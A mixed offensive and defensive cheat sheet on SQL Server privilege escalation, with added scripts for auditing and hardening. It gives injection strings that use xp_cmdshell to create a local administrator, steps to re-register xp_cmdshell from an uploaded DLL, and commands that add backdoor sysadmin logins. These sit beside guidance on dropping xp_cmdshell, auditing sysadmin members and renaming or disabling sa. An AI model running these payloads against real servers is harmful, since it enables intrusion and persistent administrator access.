Commands related to SQL Server privilege escalation and prevention measures
; exec master..xp_cmdshell 'net user name password /add' --
; exec master..xp_cmdshell 'net localgroup administrators name /add' --
SQL statement to enable the shell (register the xp_cmdshell extended stored procedure):
exec sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll'
Determine whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'
If the returned result is 1, the procedure is registered.
Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'
If the returned result is 1, the procedure is registered.
Otherwise, upload xplog70.dll and register it with its full path:
exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'
SQL statement to block the shell (prevention: drop the extended stored procedure):
exec sp_dropextendedproc 'xp_cmdshell'
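The check above (is xp_cmdshell registered?) and the prevention step (drop it) are SQL Server 2000 commands. The following is an added audit-and-harden script, not code from the original post; it assumes it is run in master by a sysadmin, and that for the second and third batches the server is SQL Server 2005 or later, where xp_cmdshell is a server option controlled through sp_configure rather than a separately registered DLL.

```sql
-- Added example (not from the original post). Assumes sysadmin rights in master.

-- 1) SQL Server 2000 style check from the post: is the extended procedure registered?
--    A count of 1 means xp_cmdshell is present and callable by anyone granted it.
SELECT COUNT(*) AS xp_cmdshell_registered
FROM master.dbo.sysobjects
WHERE xtype = 'X' AND name = 'xp_cmdshell';
GO

-- 2) SQL Server 2005 and later (assumption about server version): xp_cmdshell is a
--    configuration option. value_in_use = 1 means it is enabled.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
GO

-- 3) Disable it (the supported replacement for sp_dropextendedproc on newer servers).
--    'show advanced options' must be on before xp_cmdshell can be configured.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
GO

-- 4) Re-run the check from step 2 to confirm the change took effect.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
GO
```

After the third batch, the final query returns 0 in value_in_use. Because the option can be turned back on by anyone holding sysadmin, the more durable control is limiting sysadmin membership, which the audit query further down covers.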
DOS (Windows command prompt) commands:
dir c:\
dir d:\
dir e:\
net user tsinternetusers password /add
net localgroup administrators tsinternetusers /add
Back up and re-apply the local security policy with secedit:
secedit /export /cfg c:\tmp.inf
echo SeDenyNetworkLogonRight= >> c:\tmp.inf
secedit /configure /db c:\windows\secedit.sdb /cfg c:\tmp.inf
SQL:
exec master..sp_addlogin 'username', 'password'
exec master..sp_addsrvrolemember 'username', 'sysadmin'
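Since a login added with sp_addlogin and promoted with sp_addsrvrolemember looks like any other administrator, the practical defence is a periodic listing of sysadmin membership. The script below is an added example, not from the original post; the first batch works on SQL Server 2000 and later, the second assumes SQL Server 2005 or later (catalog views), and 'suspicious_login' is a placeholder name.

```sql
-- Added example (not from the original post). Assumes sysadmin rights.

-- 1) Members of the sysadmin fixed server role (SQL Server 2000 and later).
EXEC sp_helpsrvrolemember 'sysadmin';
GO

-- 2) SQL Server 2005 and later (assumption about server version): the catalog
--    views also expose when each member login was created and whether it is
--    disabled, so a login created recently and holding sysadmin stands out.
SELECT m.name        AS member_login,
       m.type_desc   AS login_type,
       m.create_date AS created,
       m.is_disabled AS disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.create_date DESC;
GO

-- 3) Remove a login that should not be there ('suspicious_login' is a placeholder;
--    these are the inverse of the sp_addlogin / sp_addsrvrolemember pair above).
-- EXEC sp_dropsrvrolemember 'suspicious_login', 'sysadmin';
-- EXEC sp_droplogin 'suspicious_login';
```

Compare the output of step 2 against the list of administrators you expect; anything else is either an undocumented change or the result of the escalation path this page describes.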
Renaming and deleting the sa account
First open Enterprise Manager, choose SQL Server Configuration Properties from the Tools menu, click the Server Settings tab, tick the checkbox in front of "Allow modifications to be made directly to the system catalogs", and click OK.
Open Query Analyzer and log in (haha, whatever account you like, but it must have db_owner permission in the master database).
update sysxlogins set name = 'the name you want to change to' where sid = 0x01
update sysxlogins set sid = 0xe765555bd44f054f89cd0076a06ea823 where name = 'the name you want to change to'
OK, the statements run successfully. Switch to Enterprise Manager, refresh Logins under Security, and you can see that sa has become xwq. Haha, right-click xwq and the Delete option is now shown; delete it. Check, and sa is gone.
Postscript
How to delete sa directly in Query Analyzer
Deleting sa directly in Query Analyzer works like the method above, but this time it is not done in Enterprise Manager; instead, SQL Server gives us a powerful stored procedure for the job. The stored procedure used is sp_configure, which displays or changes the global configuration settings of the current server.
Its syntax:
sp_configure [[@configname =] 'name']
    [, [@configvalue =] 'value']
Example:
sp_configure 'allow updates', 1
go
reconfigure with override
go
Good, now we can update the system tables. Next run update sysxlogins set name = 'the name you want to change to' where sid = 0x01, then delete "the name you renamed it to".
However, note that execute permission on sp_configure without parameters (or with only the first parameter) is granted to all users by default. Execute permission on sp_configure with two parameters (used to change configuration options) is granted by default to the sysadmin and serveradmin fixed server roles. Permission to run RECONFIGURE is granted by default to the sysadmin and serveradmin fixed server roles and cannot be transferred. The account must also be db_owner in master.
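Editing sysxlogins through 'allow updates' is a SQL Server 2000 technique; on SQL Server 2005 and later direct system-catalog updates are no longer permitted. The following is an added example, not from the original post, showing the supported way to reach the same goal (sa no longer usable under its well-known name) on those versions. It assumes SQL Server 2005 or later and sysadmin rights, and reuses the new name xwq from the post above.

```sql
-- Added example (not from the original post). Assumes SQL Server 2005 or later
-- and sysadmin rights; 'xwq' is the replacement name used in the post.

-- 1) Find the login that currently carries the built-in sa SID (0x01),
--    whatever it happens to be called.
SELECT name, is_disabled
FROM sys.server_principals
WHERE sid = 0x01;
GO

-- 2) Rename sa and disable it. ALTER LOGIN replaces the sysxlogins update;
--    the built-in login cannot be dropped on these versions, so disabling
--    it is the equivalent of the post's final delete step.
ALTER LOGIN sa WITH NAME = xwq;
ALTER LOGIN xwq DISABLE;
GO

-- 3) Re-run the query from step 1 to confirm the login with SID 0x01 is now
--    named xwq and flagged as disabled.
SELECT name, is_disabled
FROM sys.server_principals
WHERE sid = 0x01;
GO
```

Querying by sid = 0x01 rather than by name is the useful habit here: it finds the built-in administrator login even after it has been renamed, which is exactly what the rename in the post is meant to hide from an attacker guessing "sa".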